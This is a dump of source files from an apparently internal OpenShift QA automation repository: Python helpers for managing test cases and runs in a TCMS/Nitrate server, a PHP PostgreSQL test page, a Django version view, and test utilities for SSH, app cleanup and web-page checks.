self.ns.TestCase.filter(filter_dict)\n for test in tests:\n script = test['script'].split('.py')[0].replace(\"/\", \".\")\n args = test['arguments']\n case_id = test['case_id']\n test_scripts.append((script, args, case_id))\n return test_scripts\n\n def get_test_runs_by_build(self, build_name):\n build_id = self.get_build_id(build_name)\n runs = self.ns.Build.get_runs(build_id)\n return runs\n\n\n def get_testcases_by_components(self, comp_name):\n plan_id = self.test_plan['plan_id']\n filter_dict = {'component__name': comp_name, 'plan': plan_id}\n #testcases = {}\n ts_list = self.ns.TestCase.filter(filter_dict)\n print(\"Component: %s, testcases: %s\" % (comp_name, len(ts_list)))\n return ts_list\n\n def get_testcase_by_script_name(self, script_name):\n plan_id = self.test_plan['plan_id']\n filter_dict = {'script' : script_name}\n ts_list = self.ns.TestCase.filter(filter_dict)\n print(\"ts_list: %s\" % ts_list)\n return ts_list[0]\n\n def get_case_ids_by_components(self, comp_name):\n \"\"\" return a list of testcases's id \"\"\"\n tc_list = self.get_testcases_by_components(comp_name)\n tc_id_list = []\n for tc in tc_list:\n tc_id_list.append(tc['case_id'])\n return tc_id_list\n\n def get_testcases_with_variants(self):\n \"\"\"\n return a list of testcases that contain the variants in its argument\n 
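(here 'arguments' is a Python dict literal stored in TCMS, e.g. {'variants': ['php', 'perl']} - an illustrative value - which get_testcase_arguments() below recovers with eval())\n 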
XXX: unfortunately, TestCase.filter does not support arguments yet.\n \"\"\"\n plan_id = self.test_plan['plan_id']\n filter_dict = {'arguments__icontain': 'variants', 'plan': plan_id}\n ts_list = self.ns.TestCase.filter(filter_dict)\n return ts_list\n\n def get_testcase_arguments(self, testcase_id):\n res = self.ns.TestCase.get(testcase_id)\n variants = []\n if res['arguments']:\n arg = eval(res['arguments'])\n if arg.has_key('variants'):\n variants = arg['variants']\n return variants\n\n def get_variants_mapping(self, testcase_ids):\n testcase_variants = {}\n print testcase_ids\n for testcase_id in testcase_ids:\n if testcase_id:\n variants = self.get_testcase_arguments(testcase_id)\n if len(variants) > 0:\n testcase_variants[testcase_id] = variants\n return testcase_variants\n\n\n def get_plan_runs(self, plan_name):\n # first get plan info\n plan_dict = self.ns.TestPlan.filter({'name': plan_name})[0]\n plan_id = plan_dict['plan_id']\n test_runs = self.ns.TestPlan.get_test_runs(plan_id)\n self.test_plan_cases = self.ns.TestPlan.get_test_cases(plan_id)\n return test_runs\n \n\n def get_daily_runs(self, target_date=None):\n \"\"\" return all the runs done on a daily bases, the the target_date is\n empty, then default to to \n XXX: please note that the server is based in Beijing, China...so \n have to take care of time difference\n \"\"\"\n tcms_time = self.tcms_time\n\n if target_date is None:\n # default to today, but since the data server is located in\n # Beijing, we need to compensate, for the first cut, assume we are\n # running the job in California, so the difference is 15 hrs.\n end_date = (tcms_time + timedelta(days=1)).strftime(\"%Y-%m-%d\")\n start_date = tcms_time.strftime(\"%Y-%m-%d\")\n else:\n date_format = \"%Y-%m-%d\"\n start_date = target_date\n sd = datetime.datetime.strptime(target_date, date_format)\n end_date = (sd + datetime.timedelta(days=1)).strftime(date_format)\n\n run_filter = {\n 'plan' : self.test_plan['plan_id'], \n #'stop_date__gte': (start_date)\n 'stop_date__range': (start_date, end_date)\n }\n print(\"%s\" % run_filter)\n daily_runs = self.ns.TestRun.filter(run_filter)\n\n return daily_runs\n\n Components = property(get_components)\n Builds = property(get_builds)\n #TestPlan = property(get_test_plan)\n \n def create_testrun(self, test_id_list, build_version, summary, test_run_id=None):\n \"\"\"\n can be used by test scripts to create a test run into TCMS system.\n each individual testcase run is attached to a top level test run and\n therefore a TestRun entry into the system is needed \n \n +-------------------+----------------+-----------+------------------------------------+\n | Field | Type | Null | Description |\n +-------------------+----------------+-----------+------------------------------------+\n | plan | Integer | Required | ID of test plan |\n | build | Integer/String | Required | ID of Build |\n | manager | Integer | Required | ID of run manager |\n | summary | String | Required | |\n | product | Integer | Required | ID of product |\n | product_version | Integer | Required | ID of product version |\n | default_tester | Integer | Optional | ID of run default tester |\n | plan_text_version | Integer | Optional | |\n | estimated_time | TimeDelta | Optional | HH:MM:MM |\n | notes | String | Optional | |\n | status | Integer | Optional | 0:RUNNING 1:STOPPED (default 0) |\n | case | Array/String | Optional | list of case ids to add to the run |\n | tag | Array/String | Optional | list of tag to add to the run |\n 
+-------------------+----------------+-----------+------------------------------------+\n \"\"\"\n build_info = self.check_and_insert_build(build_version)\n if build_info is dict:\n build_id = build_info['build_id']\n else:\n build_id = build_info\n #build_id = self.check_and_insert_build(builds[0]['build_id']\n prod_version_id = self.get_product_version_id()\n run_res = None\n if summary:\n summary_note = summary\n else:\n summary_note = 'TestRun create via XML-RPC'\n if test_run_id is None:\n params = {\n 'plan' : self.plan_id,\n 'build' : build_id, #'unspecified',\n 'manager' : self.test_plan['author_id'],\n 'product' : self.test_plan['product_id'],\n 'summary' : summary_note,\n 'product_version':prod_version_id, #self.test_plan['default_product_version']\n \n }\n run_res = self.ns.TestRun.create(params)\n test_run_id = run_res['run_id']\n # step2. create the actual testrun based on test_id\n testcase_run_res = []\n for test_id in test_id_list:\n input_params = {\n 'run' : test_run_id,\n 'case' : test_id,\n 'build' : build_id,\n }\n case_run_res = self.ns.TestCaseRun.create(input_params)\n testcase_run_res.append(case_run_res)\n return (testcase_run_res)\n\n \n ######################################################################\n # action reponses\n # these class methods in response to the user option.action\n ######################################################################\n \n def get_latest_runs(self, test_ids):\n \"\"\"\n testcase_ids: is a list of test ids that you want to filter \n\n \"\"\"\n tcms_time = datetime.datetime.now()\n date_format = \"%Y-%m-%d\"\n target_date=self.test_plan['create_date']#tcms_time.strftime(\"%Y-%m-%d\")\n target_date = '2011-08-17'\n #print(\"TARGET_DATE: %s\" % target_date)\n #target_date=tcms_time.strftime(\"%Y-%m-%d\")\n #self.info('xxx', 1) \n params = {\n 'case__case_id__in': test_ids, \n #'case__summary__icontain': \"El Nath\",\n #'case_run_id' : 692230\n #'running_date__gt' : target_date,\n #'close_date__gt': target_date\n }\n #'notes': 'El Nath'}\n print(\"params: %s\" % params)\n res = self.ns.TestCaseRun.filter(params)\n new_res = []\n ###########################################\n # XXX : need to filter out by testplan\n ############################################\n if len(res) > len(test_ids):\n # testcases ran more than once get unique_run_id and put it into an array, the latest should have an id that's the biggest\n run_list = []\n target_run_id = None\n for result in res:\n run_id = result['run_id']\n test_run = self.ns.TestRun.get(run_id)\n if test_run['plan_id'] == self.test_plan['plan_id']:\n run_list.append(run_id)\n target_run_id = run_list\n \n #params = {'run': target_run_id, 'case__case_id__in': test_ids,\n # 'case_run_status__in': [1, 2, 3, 4, 5]\n # } # pass or fail\n new_res.append(result) #self.ns.TestCaseRun.filter(params)\n #self.info(\"xxx\", 1)\n else:\n new_res = res\n #self.info(\"xx\", 1)\n return new_res\n\n def get_testcase_id_by_script_name(self, script_name):\n #self.info(\"xxx\", 1)\n if '.' 
in script_name: # already in good form\n script_name = script_name.replace('.', '/') + \".py\"\n\n filter_val = {'script': script_name , 'plan': self.plan_id}\n print filter_val\n try:\n res = self.ns.TestCase.filter(filter_val)[0]\n except:\n name = script_name.replace('.', '/') + \".py\"\n filter_val = {'plan': self.plan_id, 'script': name}\n try:\n res = self.ns.TestCase.filter(filter_val)[0]\n except:\n res = None\n if res:\n return res['case_id']\n else:\n return None\n\n def get_testcase_ids(self, tests):\n \"\"\"\n given a list of RHTEST TestEntry object, retrieve a list of TCMS testCase IDs\n \"\"\"\n testcases_dict = {}\n testcases = [] # array of test\n for test in tests:\n test_name = test.inst.__module__\n if test.args: # there are arguments it's a tuple (variant, case_id)\n case_id = test.args[1]\n else: # no arguemnt\n case_id = self.get_testcase_id_by_script_name(test_name)\n testcases_dict[case_id] = test_name\n testcases.append(case_id)\n return (testcases, testcases_dict)\n\n def get_testrun(self, run_id):\n return self.ns.TestRun.get_test_case_runs(run_id)\n\n def get_testcaserun(self, tc_run_id):\n return self.ns.TestCaseRun.filter({'case_run_id': tc_run_id})\n \n def update_testcaserun(self, caserun_id, params):\n return self.ns.TestCaseRun.update(caserun_id, params)\n \n def update_testrun(self, run_id, params):\n return self.ns.TestRun.update(run_id, params)\n\n def create_testrun_from_script(self, script_name,\n build_version='unspecified'):\n \"\"\"\n create a test run in TCMS based on the testcase ID which we get with\n\n \"\"\"\n testcases = []\n case_id = self.get_testcase_id_by_script_name(script_name)\n testcases.append(case_id)\n res = self.create_testrun(testcases, build_version)\n return res\n \n def create_testcaserun(self, params):\n \n \"\"\"\n should be called after a top level testRun has been created\n \"\"\"\n pass\n\n def dump_testcases_to_json_by_tag(self, tag_name, write_to_file=False):\n \"\"\" dumps out the testcase to a json format given the tcms tag name \"\"\"\n import json\n output_name = tag_name + \".json\"\n testcases = self.get_testcases_by_tag(tag_name)\n json_output = json.dumps(testcases)\n #json_output = json.dumps(testcases, indent=4)\n if write_to_file:\n fd = open(output_name, 'w')\n fd.write(json_output + \"\\n\")\n fd.close()\n return (json_output, len(testcases))\n\n def extract_testcases_from_json(self, json_data):\n \"\"\" given a json formated testcase data, extract all of the testcase ids\"\"\"\n testcase_data = json.loads(json_data)\n for testcase in testcase_data:\n self.info(\"xxx\", 1)\n\n def get_testcases_str_by_tag(self, tag_name):\n testcases = self.get_testcases_by_tag(tag_name)\n json_ouput = json.dumps(testcases, indent)\n return testcases\n\n\n def get_tags_in_testplan(self, test_plan_id=None, tag_name = None):\n if test_plan_id is None:\n test_plan_id = self.plan_id\n \n tags = self.ns.TestPlan.get_tags(test_plan_id)\n\n # tag is a dictionary of id, name {'id': 344, 'name': 'migration'}\n if tag_name:\n for tag in tags:\n if tag['name'] == tag_name:\n return tag\n else:\n return tags\n\n def get_case_tags(self, test_plan_id=None, tag_name=None):\n if test_plan_id is None:\n test_plan_id = self.plan_id\n\n case_tags = self.ns.TestPlan.get_all_cases_tags(test_plan_id)\n casetags = []\n tags_obj = []\n\n for case_tag in case_tags:\n if tag_name:\n if case_tag['name'] == tag_name:\n casetags.append(case_tag['name'])\n tags_obj.append(case_tag)\n return case_tag['name'], case_tag\n else: \n 
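# no tag_name filter given: collect every tag attached to the plan's cases\n 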
casetags.append(case_tag['name'])\n tags_obj.append(case_tag)\n\n return casetags, tags_obj\n\n \n#######################\n# helper functions\n#######################\n\ndef construct_json_obj(script_str):\n \"\"\" given a script string convert it into a JSON object \"\"\"\n json_repr = None\n json_dict = None\n if script_str.endswith(\".py\"):\n # it's a python file\n json_dict = {\"python\" : script_str}\n elif script_str.endswith(\".rb\") or script_str.endswith(\".feature\"):\n # it's a ruby/cucumber file\n json_dict = {\"ruby\": script_str}\n io = StringIO() \n json.dump(json_dict, io)\n json_str = io.getvalue()\n return (json_str, json_dict) \n\n\ndef convert_python_script_to_json(test_obj, tcms_obj):\n script_json = None\n json_dict = None\n script_name = test_obj['script'].strip()\n try:\n script_json = json.loads(script_name)\n except:\n # the existing string is not a JSON string. construct \n script_json, json_dict = construct_json_obj(script_name)\n if json_dict:\n if json_dict.has_key('python'):\n param = {'script': script_json}\n res = tcms_obj.ns.TestCase.update(test_obj['case_id'], param)\n \n print \"ID: %s, OLD: %s, NEW: %s\" % (test_obj['case_id'], script_name, script_json)\n\ndef convert_json_to_python_script(test_obj, tcms_obj):\n \"\"\" reverse of convert_python_script_to_json \"\"\"\n script_python = None\n try:\n script_json = json.loads(test_obj['script'])\n except:\n script_json = None\n \n if script_json:\n script_python = script_json['python']\n\n param = {'script': script_python}\n res = tcms_obj.ns.TestCase.update(test_obj['case_id'], param)\n print \"ID: %s, OLD: %s, NEW: %s\" % (test_obj['case_id'], script_json, script_python)\n\ndef update_script_field_to_json_format(tcms_obj=None, testcase_id=None):\n if tcms_obj is None:\n ### XXX change this to openshift 2.0 once fully tested\n tcms_obj = TCMS(test_plan='ppp_sandbox3') #openshift 2.0')\n\n script_json = None\n if testcase_id is None:\n # go through the entire testplan looking for automated and confirmed\n params = {'is_automated': 1, 'case_status': 2}\n tests = tcms_obj.get_testcases(params)\n for test in tests:\n convert_python_script_to_json(test, tcms_obj)\n else:\n test = tcms_obj.ns.TestCase.get(testcase_id)\n convert_python_script_to_json(test, tcms_obj)\n\ndef revert_script_field_to_python_format(tcms_obj=None, testcase_id=None):\n \"\"\"\n undo update_script_field_to_json_format\n\n \"\"\"\n if tcms_obj is None:\n ### XXX change this to openshift 2.0 once fully tested\n tcms_obj = TCMS(test_plan='ppp_sandbox3') #openshift 2.0')\n\n script_python = None\n if testcase_id is None:\n # go through the entire testplan looking for automated and confirmed\n params = {'is_automated': 1, 'case_status': 2}\n tests = tcms_obj.get_testcases(params)\n for test in tests:\n convert_json_to_python_script(test, tcms_obj)\n else:\n test = tcms_obj.ns.TestCase.get(testcase_id)\n convert_json_to_python_script(test, tcms_obj)\n\n\n\ndef extract_script_field(script_field):\n \"\"\" given a testcase's script field information, extract the script path \"\"\"\n try:\n script_json = json.loads(script_field)\n except:\n # the existing string is not a JSON string. 
construct \n pass \n if not script_json.has_key('python'): \n return script_field\n else:\n return script_json['python']\n\ndef test():\n n = NitrateKerbXmlrpc('https://tcms.engineering.redhat.com/xmlrpc/')\n ns = n.server\n\n user = ns.User.get_me()\n #components = ns.Product.get_components('OpenShift Flex')\n #i = 0\n #for comp in components:\n # i += 1\n # print \"COMP %s: %s\" % (i, comp['name'])\n filter_val = {'script': 'demo/simple_demo.py'}\n #resp = ns.TestCase.filter(filter_val)\n filter_val = {'plan__name' : 'PPP'}\n res = ns.TestRun.filter(filter_val)\n #res = ns.TestRun.filter({'run_id': 23373})\n testcase_id = int(res[0]['case_id'])\n ts_run_vals = {\n 'case': testcase_id\n }\n self.info('xxx', 1)\n res = ns.TestCaseRun.create(ts_run_vals)\n\n self.info(\"xx\", 1)\n # get builds by product\n builds = ns.Product.get_builds(PROD)\n # get build_id_by_name\n build_name = '31afead'\n build_id = ns.Build.check_build(build_name, PROD)['build_id']\n runs = ns.Build.get_runs(build_id)\n \n filter_val = {'build': build_id, 'case_run_status': '2'}\n cases_p = ns.TestCaseRun.filter(filter_val)\n filter_val = {'build': build_id, 'case_run_status': '3'}\n cases_f = ns.TestCaseRun.filter(filter_val)\n\n\n\n\nif __name__ == '__main__':\n revert_script_field_to_python_format()\n self.info(\"xxx\", 1)\n #test()\n tcms = TCMS(test_plan='Test Plan for OpenShift 2.0')\n name = 'fwtest_simple'\n res = tcms.get_case_tags(tag_name=name)\n self.info('xxx', 1) \n res = tcms.dump_testcases_to_json_by_tag('manual_run')\n tc_list = tcms.extract_testcases_from_json(res)\n self.info('xx',1)\n #tcms = TCMS(test_plan='ppp_sandbox3')\n res = tcms.get_testcase_id_by_script_name('RT/security/qpid_binding_stage.py')\n #tests = tcms.get_testscripts_by_tag('test_variants')\n testcase_ids = [161932]\n build_version = 'devenv_1808'\n summary = '2012_05_31-14:20:36_QPIDbinding'\n\n tcms.create_testrun(testcase_ids, build_version, summary)\n self.info(\"xxx\", 1)\n #tests = tcms.get_testcases_by_tag('collections')\n #from datetime import time\n #total_seconds = 2332.333\n #params = {'status': 1, 'estimated_time_seconds': total_seconds }\n #res = tcms.update_testrun(38273, params)\n tests = tcms.get_testcase_id_by_script_name('Collections/Demo/Demo01.py')\n\n self.info('xxx', 1)\n tests = tcms.get_testcases()\n tc_ids = []\n for test in tests:\n if test['arguments']:\n tc_ids.append(test['case_id'])\n\n #tests = tcms.get_testcases_by_plan('Test Plan for OpenShift 2.0')\n variants_dict = tcms.get_variants_mapping(tc_ids) \n for k, v in variants_dict.items():\n print \"%s: %s\" % (k, v)\n #tcms.dump_testcaes_to_json_by_tag('quick_smoke')\n self.info('xxx', 1)\n #name = a[0]['script'].split('.py')[0].replace(\"/\", \".\")\n\n #res = tcms.check_and_insert_build('devenv_1651')\n #self.info(\"xxx\", 1)\n #res = tcms.get_testcase_id_by_script_name('demo/simple_demo.py')\n # XXX assume we have run this step already caserun id is 846534, testrun ID is '33030'\n #res = tcms.create_testrun_from_script('demo/simple_demo.py')\n #TEST_RUN_ID = 33030\n run_list = tcms.get_testrun(TEST_RUN_ID)\n for run in run_list:\n tc_run = tcms.get_testcaserun(run['case_run_id'])\n case_run_params = {'case_run_status': FAILED}\n run_params = {'status': FINISHED}\n tcms.update_testrun(TEST_RUN_ID, run_params)\n res = tcms.update_testcaserun(run['case_run_id'], case_run_params)\n self.info('xx', 1)\n #res = tcms.ns.Product.get_versions(281)\n #version_id = tcms.get_product_version_id()\n\n components = tcms.Components\n #tests = {}\n #total_tests = 
0\n #tcms.get_testcases_by_plan(3396)\n \"\"\"\n res_list = tcms.get_testcases_by_components('Admin::Rsync')\n for res in res_list:\n print res['case_id']\n \"\"\"\n #for i, comp in enumerate(components):\n # #print \"%04s: %s\" % (i, comp['name'])\n # test_cases = tcms.get_testcases_by_components(comp['name'])\n # tests[comp['name']] = test_cases\n # total_tests += len(test_cases)\n #print \"Total test cases within test plan: %s\" % total_tests\n\n #test_runs = tcms.get_plan_runs('Furud SP1')\n #build_name = '31afead'\n #runs = tcms.get_test_runs_by_build(build_name)\n #user_profile = tcms.User.get_me()\n #components = tcms.Product.get_components('OpenShift Flex')\n\n #test()\n" }, { "alpha_fraction": 0.664536714553833, "alphanum_fraction": 0.6677316427230835, "avg_line_length": 61.599998474121094, "blob_id": "37a80f0fc1207bd0c5a5159a1bea201b1d3c7ae8", "content_id": "e0cf9da729e6f16b3cfc6908ccd31b76ff42ebc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 626, "license_type": "no_license", "max_line_length": 333, "num_lines": 10, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/php/data1.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nheader('Content-Type: text/plain');\n$con = pg_connect(\"dbname=\".$_ENV[\"OPENSHIFT_APP_NAME\"].\" \".\"user=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_USERNAME\"].\" \".\"password=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PASSWORD\"].\" \".\"host=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_HOST\"].\" \".\"port=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PORT\"]) or die('Could not connect to the database: ' + pg_last_error());\n\npg_query($con, \"DROP TABLE IF EXISTS info;\");\npg_query($con, \"CREATE TABLE info(id integer PRIMARY KEY, data text);\");\npg_query($con, \"INSERT INTO info VALUES(1, '#str_random1#');\");\npg_close($con);\necho \"Please visit /show.php to see the data\";\n?>\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 30, "blob_id": "0266fbc558ed1044847d7cb71ae638e12044e919", "content_id": "7b16025e1b9f62de515ea7001aa0520cb109b2bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 155, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/automation/open/testmodules/RT/cartridge/app_template/django_custom/mydiyapp/djangotools/views.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from django import VERSION\nfrom django.http import HttpResponse\n\ndef display_version(request):\n return HttpResponse(VERSION, content_type='text/plain')\n" }, { "alpha_fraction": 0.5546044111251831, "alphanum_fraction": 0.5607691407203674, "avg_line_length": 31.645463943481445, "blob_id": "a802b9c36a29043f78dc643cd8a2185b28d2f484", "content_id": "b5cef3dd2119c95f3d488f56263a3492e58e383d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31307, "license_type": "no_license", "max_line_length": 280, "num_lines": 959, "path": "/automation/open/lib/common/misc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time, os, subprocess, sys, re\nimport OSConf\nimport pexpect\nimport json\nimport openshift #rest api\nimport shutil\nimport random\nfrom consts import CONNECT_TIMEOUT\nfrom helper import *\n\n\ndef env_setup(cleanup=True):\n \"\"\"Prepares environment for running a case by:\n * setting up proxy if necessary\n * removing 
SSH_AUTH_SOCK variable\n * deleting all apps if cleanup==True\n \"\"\"\n # Default\n #http_proxy='file.rdu.redhat.com:3128'\n\n if os.environ.has_key(\"OPENSHIFT_http_proxy\"):\n http_proxy=os.getenv(\"OPENSHIFT_http_proxy\").strip()\n if http_proxy != '' and http_proxy != 'None':\n #os.putenv(\"http_proxy\", http_proxy)\n os.environ[\"http_proxy\"]=http_proxy\n\n if os.environ.has_key(\"http_proxy\"):\n print \"---http_proxy: %s---\" %(os.getenv(\"http_proxy\"))\n else:\n print \"---no http_proxy---\"\n\n os.environ[\"HOME\"] = os.path.expanduser(\"~\")\n #os.putenv(\"HOME\", os.path.expanduser(\"~\"))\n remove_env(\"SSH_AUTH_SOCK\")\n #print os.environ[\"SSH_AUTH_SOCK\"]\n try:\n if cleanup:\n return clean_up()\n except:\n pass\n return 0\n\ndef set_env(key, value):\n print \"Setting %s=%s in os.environ\" %(key, value)\n os.environ[key]=value\n return 0\n\ndef remove_env(key):\n if os.environ.has_key(key):\n print \"Unsetting %s in os.environ\" %(key)\n os.environ.pop(key)\n return 0\n\n\ndef get_git_repo_size(app_name):\n \"\"\"\n This function returns the git repo size in KiloBytes\n \"\"\"\n ( ret_code, ret_output ) = run_remote_cmd(app_name, \"du -sk git/%s.git\" % ( app_name ))\n obj = re.search(r\"^(\\d+)\\s+git\", ret_output)\n if ret_code == 0 and obj is not None:\n return obj.group(1)\n else:\n raise Exception((\"Unable to parse the size of git repo from the output.\"\n \"(Maybe remote app/dir doesn't exist, \"\n \"or problems with SSH connection)\"))\n\n\ndef user_info(user_email=None, user_passwd=None, data_source_from_s3=False):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n '''\n if data_source_from_s3 == True:\n #TODO: What was this s3 good for?\n # I WOULD LIKE TO REMOVE TO AVOID CONFUSION\n print \"Getting user info from s3\"\n if OSConf.initial_conf() != 0:\n return 1\n '''\n return OSConf.get_apps()\n\n\ndef get_app_url_from_user_info(app_name, user_email=None, user_passwd=None, data_source_from_s3=False):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n apps_dict = user_info(user_email, user_passwd, data_source_from_s3)\n if apps_dict.has_key(app_name):\n return apps_dict[app_name]['url']\n print apps_dict\n print \"In user info, nothing about %s is found\" %(app_name)\n return None\n\n\ndef grep_web_page(url, regular_expression, options={},\n delay=7, count=7, strong=True):\n '''\n Fetch a page and grep it. \n * if the page cannot be fetched/accessed then returns 254\n * elif matches - returns 0\n * otherwise - returns 1\n\n [02/03/2012] Added extended version for matching string. \n `strong` argument means that all of the RE must be found.\n [24/04/2012] Added condition, when curl is not able to fetch the url - it will return 254\n '''\n pattern = ''\n patterns = []\n if isinstance(regular_expression, str) or isinstance(regular_expression, unicode):\n pattern = re.compile(regular_expression, re.M)\n log.info((\"Trying to find all the strings matching regular expression\"\n \" '%s' in %s\")% (regular_expression, url))\n elif isinstance(regular_expression, tuple) or isinstance(regular_expression, list):\n for p in regular_expression:\n patterns.append(re.compile(p, re.M))\n else:\n raise TypeError(\"Wrong type of 2nd argument. 
Possible types: string or list/tuple\")\n\n #fetch_cmd = \"curl %s '%s'\" % (options, url)\n # Retry 4 times\n retcode = 1\n\n #old curl support\n if isinstance(options, str):\n obj = re.search(re.compile(\"-u\\s+['\\\"]?([^:]+):([^\\s'\\\"]+)\"), options)\n if obj:\n options = get_auth_headers(obj.group(1), obj.group(2))\n\n for i in range(count):\n time.sleep(delay)\n output = fetch_page(url, options)\n\t#print \"**>>\"*30\n\t#print \"url : %s\"%url\n\t#print \"options : %s\"%options\n\t#print \"output : %s\"%output\n\t#print \"**<<\"*30\n #(retcode, output) = command_getstatusoutput(fetch_cmd, quiet = True)\n if output is not None:\n retcode = 0\n if (isinstance(regular_expression,str) \n or isinstance(regular_expression, unicode)):\n result = pattern.findall(output)\n if result != []:\n log.debug(\"Found results: %s\"% result)\n return 0\n else: # list or tuple\n summ = 0\n for p in patterns:\n result = p.findall(output)\n if result != []:\n summ += 1\n if strong: #AND\n if summ == len(patterns):\n print \"All of the patterns have been found\"\n return 0 #success\n else:\n continue\n else: #OR\n if sum(summ)>0: #at least one was found\n print \"At least one of the patterns have been found\"\n return 0\n else:\n continue\n if retcode == 0:\n return 1\n else:\n log.warning(\"Unable to access %s\"% url)\n return 254\n\ndef check_web_page_output(app_name, path='', pattern='Welcome to'):\n app_url = OSConf.get_app_url(app_name)\n return grep_web_page(\"%s/%s\" % ( app_url, path ), pattern)\n\ndef multi_subprocess(command_list=[]):\n sub_comm_dict={}\n sub_ret_dict={}\n for i in command_list:\n a = subprocess.Popen(i, stdin=open(os.devnull,'rb'), shell=True)\n sub_comm_dict[a]=i\n sub_ret_dict[a]=a.poll()\n\n ret_dict={}\n while len(sub_ret_dict)>0:\n print \"sleep 5 seconds, will check again\"\n time.sleep(5)\n\n for j in sub_ret_dict.keys():\n ret=j.poll()\n if ret != None:\n sub_ret_dict.pop(j)\n ret_dict[sub_comm_dict[j]] = ret\n #else:\n #print \"Command {%s} is running.\" %sub_comm_dict[j]\n return ret_dict\n\n\ndef _ssh_keygen(passphrase=\"\"):\n if not os.path.exists('~/.ssh/id_rsa'):\n command = \"ssh-keygen -N '' -f ~/.ssh/id_rsa\"\n ret = subprocess.call(command, shell=True)\n if ret != 0:\n return 1\n else:\n return 0\n else:\n print 'Warning: the ~/.ssh/id_rsa key already exist and will not be overwritten.'\n return 0\n\n\n\n#@exclusive\ndef prepare_libra_sshkey():\n print \"Preparing libra ssh key\"\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa\")) or not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n print \"~/.ssh/id_rsa or ~/.ssh/id_rsa.pub is not existing\"\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa\")) or not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n print \"~/.ssh/id_rsa or ~/.ssh/id_rsa.pub is not existing\"\n print \"Generating new ssh key\"\n ret = _ssh_keygen()\n if ret != 0:\n print \"ssh ken gen failed\"\n sys.exit(1)\n\n else:\n print \"id_rsa and id_rsa.pub are existing in local host\"\n\n\ndef command_getstatusoutput(command, quiet = False, timeout=COMMAND_TIMEOUT):\n return cmd_get_status_output(command, quiet, timeout)\n\n \ndef command_get_status(command, timeout=COMMAND_TIMEOUT, quiet=False):\n return cmd_get_status(command, timeout, quiet)\n\n\ndef clean_up(user_email=None, user_passwd=None):\n \"\"\"Remove all applications and cleans up cache\"\"\"\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n try:\n app_dict = user_info(user_email, user_passwd)\n retcode = 0\n 
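# destroy each cached app in turn; remember the last non-zero exit status\n 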
for app_name in app_dict.keys():\n ret = destroy_app2(app_name, user_email, user_passwd)\n if ret != 0:\n retcode = ret\n # Hot fix for Bug 958619\n # delete the app a second time\n # ret = destroy_app2(app_name, user_email, user_passwd)\n # if ret != 0:\n # retcode = ret\n except:\n #this is the case, when cache file is missing\n pass\n\n try:\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, l2) = rest.app_list()\n\n if (status == 'OK'):\n for app in l2:\n app_name = app['name']\n try:\n (stat, resp) = rest.app_delete(app_name)\n except Exception as e:\n log.error(\"Unable to destroy %s: %s\"%(app_name, str(e)))\n try:\n if os.path.exists(app_name):\n shutil.rmtree(app_name)\n except:\n pass\n else:\n log.warning(\"Unable to get the list of apps to clean up: status = %s\"%status)\n except openshift.OpenShiftNullDomainException:\n pass\n except Exception as e:\n import traceback\n traceback.print_exc(file=sys.stderr)\n log.error(\"Problem when destroying applications: %s\"%str(e))\n\n try:\n OSConf.initial_conf()\n except Exception as e:\n log.warn(\"Error during initialising cache: %s\"% e)\n\n return retcode\n\n\ndef raw_str(regex):\n special_chars = (\".\", \"^\", \"$\", \"*\", \"+\", \"?\", \"\\\\\", \"|\", \"{\", \"}\", \"[\", \"]\", \"(\", \")\")\n result = []\n l = 0\n r = 0\n while r < len(regex):\n if regex[r] in special_chars:\n if l < r:\n result.append(regex[l:r])\n result.append(\"\\\\\" + regex[r])\n l = r + 1\n r += 1\n if l < r:\n result.append(regex[l:r])\n return ''.join(result)\n\n\ndef getRandomString(length = 10):\n return get_random_string(length)\n\n\ndef rhcsh(app_name, commands):\n '''\n Execute commands inside rhcsh shell:\n `commands' as an argument has to be list of pexpect commands:\n [\n (<sendline|expect>, <value>, [timeout_in_seconds]),\n ('sendline', 'ls -l'),\n ('expect', '/tmp/*',10),\n ('sendline', 'cd /bin'),\n ('sendline', 'exit'),\n ]\n '''\n ssh_url = OSConf.get_app_url(app_name)\n username = OSConf.get_app_uuid(app_name)\n ssh_options = \" -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"\n p = pexpect.spawn('ssh %s %s@%s rhcsh '%(ssh_options, username, ssh_url))\n p.logfile = sys.stdout\n for cmd in commands:\n eval(\"p.%s('%s')\"%cmd)\n p.terminate(force=True)\n\n return 0\n\n\ndef run_remote_cmd_as_root2(cmd, host=None, quiet=False):\n \"\"\"\n If host==None => \"broker\" (sufficient in single node environment)\n \"\"\"\n return run_remote_cmd2(None, cmd, as_root=True, host=host, quiet=quiet)\n\n\ndef run_remote_cmd_as_root(cmd, host=None, quiet=False):\n \"\"\"\n If host==None => \"broker\" (sufficient in single node environment)\n \"\"\"\n return run_remote_cmd(None, cmd, as_root=True, host=host, quiet=quiet)\n\n\ndef run_remote_cmd(app_name, cmd, as_root=False, host=None, quiet=False):\n \"\"\"Using paramiko client\"\"\"\n if as_root:\n user = 'root'\n if not host:\n #host = get_instance_ip()\n ssh_url = OSConf.get_ssh_url(app_name)\n host = os.popen('ssh %s hostname'%ssh_url).read().strip('\\n')\n key_filename = get_root_ssh_key()\n else:\n user = OSConf.get_app_uuid(app_name)\n if not 